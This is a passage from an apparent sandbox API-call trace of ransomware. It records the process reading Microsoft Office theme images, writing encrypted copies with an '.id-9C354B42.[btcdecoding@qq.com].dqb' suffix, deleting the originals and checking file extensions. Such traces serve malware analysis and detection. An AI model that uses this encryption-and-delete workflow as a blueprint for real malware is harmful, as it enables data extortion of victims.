liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c7fec8 | out: lpNewFilePointer=0x0) returned 1 [0043.790] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EDGE\\PREVIEW.GIF.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\edge\\preview.gif.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x204 [0044.114] GetLastError () returned 0x0 [0044.114] ReadFile (in: hFile=0x174, lpBuffer=0x3760020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c7fed4, lpOverlapped=0x0 | out: lpBuffer=0x3760020*, lpNumberOfBytesRead=0x2c7fed4*=0x543, lpOverlapped=0x0) returned 1 [0044.118] WriteFile (in: hFile=0x204, lpBuffer=0x3760020*, nNumberOfBytesToWrite=0x550, lpNumberOfBytesWritten=0x2c7fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3760020*, lpNumberOfBytesWritten=0x2c7fc9c*=0x550, lpOverlapped=0x0) returned 1 [0044.119] ReadFile (in: hFile=0x174, lpBuffer=0x3760020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c7fed4, lpOverlapped=0x0 | out: lpBuffer=0x3760020*, lpNumberOfBytesRead=0x2c7fed4*=0x0, lpOverlapped=0x0) returned 1 [0044.119] WriteFile (in: hFile=0x204, lpBuffer=0x3760020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0x2c7fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3760020*, lpNumberOfBytesWritten=0x2c7fc9c*=0xea, lpOverlapped=0x0) returned 1 [0044.119] SetEndOfFile (hFile=0x204) returned 1 [0044.119] CloseHandle (hObject=0x204) returned 1 [0044.119] SetFilePointerEx (in: hFile=0x174, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c7fec8 | out: lpNewFilePointer=0x0) returned 1 [0044.119] SetEndOfFile (hFile=0x174) returned 1 [0044.120] CloseHandle (hObject=0x174) returned 1 [0044.120] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EDGE\\PREVIEW.GIF.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x20) returned 1 [0044.120] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EDGE\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\edge\\preview.gif")) returned 1 [0044.120] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EDGE\\PREVIEW.GIF") returned 72 [0044.120] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EDGE\\PREVIEW.GIF") returned 72 [0044.120] lstrlenW (lpString=".doc") returned 4 [0044.120] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0044.120] lstrlenW (lpString=".docx") returned 5 [0044.120] lstrcmpiW (lpString1=".docx", lpString2="W.GIF") returned -1 [0044.120] lstrlenW (lpString=".pdf") returned 4 [0044.121] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0044.121] lstrlenW (lpString=".xls") returned 4 [0044.121] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0044.121] lstrlenW (lpString=".xlsx") returned 5 [0044.121] lstrcmpiW (lpString1=".xlsx", lpString2="W.GIF") returned -1 [0044.121] lstrlenW (lpString=".ppt") returned 4 [0044.121] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0044.121] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EDGE\\PREVIEW.GIF") returned 72 [0044.121] lstrlenW (lpString=".zip") returned 4 [0044.121] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0044.121] lstrlenW (lpString=".rar") returned 4 [0044.121] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0044.121] lstrlenW (lpString=".bz2") returned 4 [0044.121] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0044.121] lstrlenW (lpString=".7z") returned 3 [0044.121] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0044.121] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EDGE\\PREVIEW.GIF") returned 72 [0044.121] lstrlenW (lpString=".dbf") returned 4 [0044.121] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0044.121] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EDGE\\PREVIEW.GIF") returned 72 [0044.121] lstrlenW (lpString=".1cd") returned 4 [0044.121] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0044.121] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EDGE\\PREVIEW.GIF") returned 72 [0044.121] lstrlenW (lpString=".jpg") returned 4 [0044.121] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0044.121] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EDGE\\PREVIEW.GIF") returned 72 [0044.121] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EDGE\\PREVIEW.GIF") returned 72 [0044.121] lstrlenW (lpString=".doc") returned 4 [0044.121] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0044.121] lstrlenW (lpString=".docx") returned 5 [0044.121] lstrcmpiW (lpString1=".docx", lpString2="W.GIF") returned -1 [0044.121] lstrlenW (lpString=".pdf") returned 4 [0044.121] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0044.122] lstrlenW (lpString=".xls") returned 4 [0044.122] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0044.122] lstrlenW (lpString=".xlsx") returned 5 [0044.122] lstrcmpiW (lpString1=".xlsx", lpString2="W.GIF") returned -1 [0044.122] lstrlenW (lpString=".ppt") returned 4 [0044.122] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0044.122] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EDGE\\PREVIEW.GIF") returned 72 [0044.122] lstrlenW (lpString=".zip") returned 4 [0044.122] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0044.122] lstrlenW (lpString=".rar") returned 4 [0044.122] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0044.122] lstrlenW (lpString=".bz2") returned 4 [0044.122] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0044.122] lstrlenW (lpString=".7z") returned 3 [0044.122] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0044.122] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EDGE\\PREVIEW.GIF") returned 72 [0044.122] lstrlenW (lpString=".dbf") returned 4 [0044.122] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0044.122] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EDGE\\PREVIEW.GIF") returned 72 [0044.122] lstrlenW (lpString=".1cd") returned 4 [0044.122] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0044.122] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EDGE\\PREVIEW.GIF") returned 72 [0044.122] lstrlenW (lpString=".jpg") returned 4 [0044.122] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0044.122] lstrcmpiW (lpString1=".GIF", lpString2=".dqb") returned 1 [0044.122] lstrlenW (lpString="PREVIEW.GIF") returned 11 [0044.122] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\INDUST\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\indust\\preview.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x174 [0044.123] GetFileSizeEx (in: hFile=0x174, lpFileSize=0x2c7ff1c | out: lpFileSize=0x2c7ff1c*=5179) returned 1 [0044.123] CloseHandle (hObject=0x174) returned 1 [0044.124] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\INDUST\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\indust\\preview.gif")) returned 0x20 [0044.124] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\INDUST\\PREVIEW.GIF.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\indust\\preview.gif.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0044.124] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\INDUST\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\indust\\preview.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x174 [0044.124] SetFilePointerEx (in: hFile=0x174, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c7fec8 | out: lpNewFilePointer=0x0) returned 1 [0044.124] SetFilePointerEx (in: hFile=0x174, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c7fec8 | out: lpNewFilePointer=0x0) returned 1 [0044.124] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\INDUST\\PREVIEW.GIF.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\indust\\preview.gif.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x204 [0044.126] GetLastError () returned 0x0 [0044.126] ReadFile (in: hFile=0x174, lpBuffer=0x3760020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c7fed4, lpOverlapped=0x0 | out: lpBuffer=0x3760020*, lpNumberOfBytesRead=0x2c7fed4*=0x143b, lpOverlapped=0x0) returned 1 [0044.127] WriteFile (in: hFile=0x204, lpBuffer=0x3760020*, nNumberOfBytesToWrite=0x1440, lpNumberOfBytesWritten=0x2c7fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3760020*, lpNumberOfBytesWritten=0x2c7fc9c*=0x1440, lpOverlapped=0x0) returned 1 [0044.129] ReadFile (in: hFile=0x174, lpBuffer=0x3760020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c7fed4, lpOverlapped=0x0 | out: lpBuffer=0x3760020*, lpNumberOfBytesRead=0x2c7fed4*=0x0, lpOverlapped=0x0) returned 1 [0044.129] WriteFile (in: hFile=0x204, lpBuffer=0x3760020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0x2c7fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3760020*, lpNumberOfBytesWritten=0x2c7fc9c*=0xea, lpOverlapped=0x0) returned 1 [0044.129] SetEndOfFile (hFile=0x204) returned 1 [0044.129] CloseHandle (hObject=0x204) returned 1 [0044.129] SetFilePointerEx (in: hFile=0x174, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c7fec8 | out: lpNewFilePointer=0x0) returned 1 [0044.129] SetEndOfFile (hFile=0x174) returned 1 [0044.130] CloseHandle (hObject=0x174) returned 1 [0044.130] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\INDUST\\PREVIEW.GIF.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x20) returned 1 [0044.130] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\INDUST\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\indust\\preview.gif")) returned 1 [0044.130] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\INDUST\\PREVIEW.GIF") returned 74 [0044.130] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\INDUST\\PREVIEW.GIF") returned 74 [0044.130] lstrlenW (lpString=".doc") returned 4 [0044.130] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0044.130] lstrlenW (lpString=".docx") returned 5 [0044.130] lstrcmpiW (lpString1=".docx", lpString2="W.GIF") returned -1 [0044.130] lstrlenW (lpString=".pdf") returned 4 [0044.130] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0044.130] lstrlenW (lpString=".xls") returned 4 [0044.130] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0044.130] lstrlenW (lpString=".xlsx") returned 5 [0044.130] lstrcmpiW (lpString1=".xlsx", lpString2="W.GIF") returned -1 [0044.131] lstrlenW (lpString=".ppt") returned 4 [0044.131] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0044.131] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\INDUST\\PREVIEW.GIF") returned 74 [0044.131] lstrlenW (lpString=".zip") returned 4 [0044.131] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0044.131] lstrlenW (lpString=".rar") returned 4 [0044.131] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0044.131] lstrlenW (lpString=".bz2") returned 4 [0044.131] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0044.131] lstrlenW (lpString=".7z") returned 3 [0044.131] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0044.131] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\INDUST\\PREVIEW.GIF") returned 74 [0044.131] lstrlenW (lpString=".dbf") returned 4 [0044.131] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0044.131] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\INDUST\\PREVIEW.GIF") returned 74 [0044.131] lstrlenW (lpString=".1cd") returned 4 [0044.131] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0044.131] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\INDUST\\PREVIEW.GIF") returned 74 [0044.131] lstrlenW (lpString=".jpg") returned 4 [0044.131] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0044.131] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\INDUST\\PREVIEW.GIF") returned 74 [0044.131] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\INDUST\\PREVIEW.GIF") returned 74 [0044.131] lstrlenW (lpString=".doc") returned 4 [0044.131] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0044.131] lstrlenW (lpString=".docx") returned 5 [0044.131] lstrcmpiW (lpString1=".docx", lpString2="W.GIF") returned -1 [0044.131] lstrlenW (lpString=".pdf") returned 4 [0044.131] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0044.131] lstrlenW (lpString=".xls") returned 4 [0044.131] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0044.131] lstrlenW (lpString=".xlsx") returned 5 [0044.131] lstrcmpiW (lpString1=".xlsx", lpString2="W.GIF") returned -1 [0044.131] lstrlenW (lpString=".ppt") returned 4 [0044.131] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0044.131] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\INDUST\\PREVIEW.GIF") returned 74 [0044.131] lstrlenW (lpString=".zip") returned 4 [0044.132] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0044.132] lstrlenW (lpString=".rar") returned 4 [0044.132] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0044.132] lstrlenW (lpString=".bz2") returned 4 [0044.132] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0044.132] lstrlenW (lpString=".7z") returned 3 [0044.132] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0044.132] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\INDUST\\PREVIEW.GIF") returned 74 [0044.132] lstrlenW (lpString=".dbf") returned 4 [0044.132] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0044.132] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\INDUST\\PREVIEW.GIF") returned 74 [0044.132] lstrlenW (lpString=".1cd") returned 4 [0044.132] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0044.132] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\INDUST\\PREVIEW.GIF") returned 74 [0044.132] lstrlenW (lpString=".jpg") returned 4 [0044.132] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0044.132] lstrcmpiW (lpString1=".PNG", lpString2=".dqb") returned 1 [0044.132] lstrlenW (lpString="THMBNAIL.PNG") returned 12 [0044.132] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\INDUST\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\indust\\thmbnail.png"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x174 [0044.132] GetFileSizeEx (in: hFile=0x174, lpFileSize=0x2c7ff1c | out: lpFileSize=0x2c7ff1c*=33559) returned 1 [0044.132] CloseHandle (hObject=0x174) returned 1 [0044.133] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\INDUST\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\indust\\thmbnail.png")) returned 0x20 [0044.133] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\INDUST\\THMBNAIL.PNG.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\indust\\thmbnail.png.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0044.133] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\INDUST\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\indust\\thmbnail.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x174 [0044.133] SetFilePointerEx (in: hFile=0x174, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c7fec8 | out: lpNewFilePointer=0x0) returned 1 [0044.133] SetFilePointerEx (in: hFile=0x174, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c7fec8 | out: lpNewFilePointer=0x0) returned 1 [0044.133] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\INDUST\\THMBNAIL.PNG.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\indust\\thmbnail.png.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x204 [0044.133] GetLastError () returned 0x0 [0044.133] ReadFile (in: hFile=0x174, lpBuffer=0x3760020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c7fed4, lpOverlapped=0x0 | out: lpBuffer=0x3760020*, lpNumberOfBytesRead=0x2c7fed4*=0x8317, lpOverlapped=0x0) returned 1 [0044.135] WriteFile (in: hFile=0x204, lpBuffer=0x3760020*, nNumberOfBytesToWrite=0x8320, lpNumberOfBytesWritten=0x2c7fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3760020*, lpNumberOfBytesWritten=0x2c7fc9c*=0x8320, lpOverlapped=0x0) returned 1 [0044.136] ReadFile (in: hFile=0x174, lpBuffer=0x3760020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c7fed4, lpOverlapped=0x0 | out: lpBuffer=0x3760020*, lpNumberOfBytesRead=0x2c7fed4*=0x0, lpOverlapped=0x0) returned 1 [0044.137] WriteFile (in: hFile=0x204, lpBuffer=0x3760020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2c7fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3760020*, lpNumberOfBytesWritten=0x2c7fc9c*=0xec, lpOverlapped=0x0) returned 1 [0044.137] SetEndOfFile (hFile=0x204) returned 1 [0044.137] CloseHandle (hObject=0x204) returned 1 [0044.137] SetFilePointerEx (in: hFile=0x174, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c7fec8 | out: lpNewFilePointer=0x0) returned 1 [0044.137] SetEndOfFile (hFile=0x174) returned 1 [0044.138] CloseHandle (hObject=0x174) returned 1 [0044.138] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\INDUST\\THMBNAIL.PNG.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x20) returned 1 [0044.138] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\INDUST\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\indust\\thmbnail.png")) returned 1 [0044.138] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\INDUST\\THMBNAIL.PNG") returned 75 [0044.138] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\INDUST\\THMBNAIL.PNG") returned 75 [0044.138] lstrlenW (lpString=".doc") returned 4 [0044.138] lstrcmpiW (lpString1=".doc", lpString2=".PNG") returned -1 [0044.138] lstrlenW (lpString=".docx") returned 5 [0044.138] lstrcmpiW (lpString1=".docx", lpString2="L.PNG") returned -1 [0044.138] lstrlenW (lpString=".pdf") returned 4 [0044.138] lstrcmpiW (lpString1=".pdf", lpString2=".PNG") returned -1 [0044.138] lstrlenW (lpString=".xls") returned 4 [0044.139] lstrcmpiW (lpString1=".xls", lpString2=".PNG") returned 1 [0044.139] lstrlenW (lpString=".xlsx") returned 5 [0044.139] lstrcmpiW (lpString1=".xlsx", lpString2="L.PNG") returned -1 [0044.139] lstrlenW (lpString=".ppt") returned 4 [0044.139] lstrcmpiW (lpString1=".ppt", lpString2=".PNG") returned 1 [0044.139] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\INDUST\\THMBNAIL.PNG") returned 75 [0044.139] lstrlenW (lpString=".zip") returned 4 [0044.139] lstrcmpiW (lpString1=".zip", lpString2=".PNG") returned 1 [0044.139] lstrlenW (lpString=".rar") returned 4 [0044.139] lstrcmpiW (lpString1=".rar", lpString2=".PNG") returned 1 [0044.139] lstrlenW (lpString=".bz2") returned 4 [0044.139] lstrcmpiW (lpString1=".bz2", lpString2=".PNG") returned -1 [0044.139] lstrlenW (lpString=".7z") returned 3 [0044.139] lstrcmpiW (lpString1=".7z", lpString2="PNG") returned -1 [0044.139] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\INDUST\\THMBNAIL.PNG") returned 75 [0044.139] lstrlenW (lpString=".dbf") returned 4 [0044.139] lstrcmpiW (lpString1=".dbf", lpString2=".PNG") returned -1 [0044.139] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\INDUST\\THMBNAIL.PNG") returned 75 [0044.139] lstrlenW (lpString=".1cd") returned 4 [0044.139] lstrcmpiW (lpString1=".1cd", lpString2=".PNG") returned -1 [0044.139] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\INDUST\\THMBNAIL.PNG") returned 75 [0044.139] lstrlenW (lpString=".jpg") returned 4 [0044.139] lstrcmpiW (lpString1=".jpg", lpString2=".PNG") returned -1 [0044.139] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\INDUST\\THMBNAIL.PNG") returned 75 [0044.139] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\INDUST\\THMBNAIL.PNG") returned 75 [0044.139] lstrlenW (lpString=".doc") returned 4 [0044.139] lstrcmpiW (lpString1=".doc", lpString2=".PNG") returned -1 [0044.139] lstrlenW (lpString=".docx") returned 5 [0044.139] lstrcmpiW (lpString1=".docx", lpString2="L.PNG") returned -1 [0044.139] lstrlenW (lpString=".pdf") returned 4 [0044.139] lstrcmpiW (lpString1=".pdf", lpString2=".PNG") returned -1 [0044.139] lstrlenW (lpString=".xls") returned 4 [0044.139] lstrcmpiW (lpString1=".xls", lpString2=".PNG") returned 1 [0044.139] lstrlenW (lpString=".xlsx") returned 5 [0044.139] lstrcmpiW (lpString1=".xlsx", lpString2="L.PNG") returned -1 [0044.139] lstrlenW (lpString=".ppt") returned 4 [0044.140] lstrcmpiW (lpString1=".ppt", lpString2=".PNG") returned 1 [0044.140] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\INDUST\\THMBNAIL.PNG") returned 75 [0044.140] lstrlenW (lpString=".zip") returned 4 [0044.140] lstrcmpiW (lpString1=".zip", lpString2=".PNG") returned 1 [0044.140] lstrlenW (lpString=".rar") returned 4 [0044.140] lstrcmpiW (lpString1=".rar", lpString2=".PNG") returned 1 [0044.140] lstrlenW (lpString=".bz2") returned 4 [0044.140] lstrcmpiW (lpString1=".bz2", lpString2=".PNG") returned -1 [0044.140] lstrlenW (lpString=".7z") returned 3 [0044.140] lstrcmpiW (lpString1=".7z", lpString2="PNG") returned -1 [0044.140] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\INDUST\\THMBNAIL.PNG") returned 75 [0044.140] lstrlenW (lpString=".dbf") returned 4 [0044.140] lstrcmpiW (lpString1=".dbf", lpString2=".PNG") returned -1 [0044.140] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\INDUST\\THMBNAIL.PNG") returned 75 [0044.140] lstrlenW (lpString=".1cd") returned 4 [0044.140] lstrcmpiW (lpString1=".1cd", lpString2=".PNG") returned -1 [0044.140] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\INDUST\\THMBNAIL.PNG") returned 75 [0044.140] lstrlenW (lpString=".jpg") returned 4 [0044.140] lstrcmpiW (lpString1=".jpg", lpString2=".PNG") returned -1 [0044.140] lstrcmpiW (lpString1=".GIF", lpString2=".dqb") returned 1 [0044.140] lstrlenW (lpString="PREVIEW.GIF") returned 11 [0044.140] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\IRIS\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\iris\\preview.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x174 [0044.141] GetFileSizeEx (in: hFile=0x174, lpFileSize=0x2c7ff1c | out: lpFileSize=0x2c7ff1c*=2476) returned 1 [0044.141] CloseHandle (hObject=0x174) returned 1 [0044.141] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\IRIS\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\iris\\preview.gif")) returned 0x20 [0044.141] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\IRIS\\PREVIEW.GIF.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\iris\\preview.gif.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0044.141] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\IRIS\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\iris\\preview.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x174 [0044.141] SetFilePointerEx (in: hFile=0x174, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c7fec8 | out: lpNewFilePointer=0x0) returned 1 [0044.141] SetFilePointerEx (in: hFile=0x174, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c7fec8 | out: lpNewFilePointer=0x0) returned 1 [0044.141] CreateFileW (lpFileName="C:\\Program Files\\Common 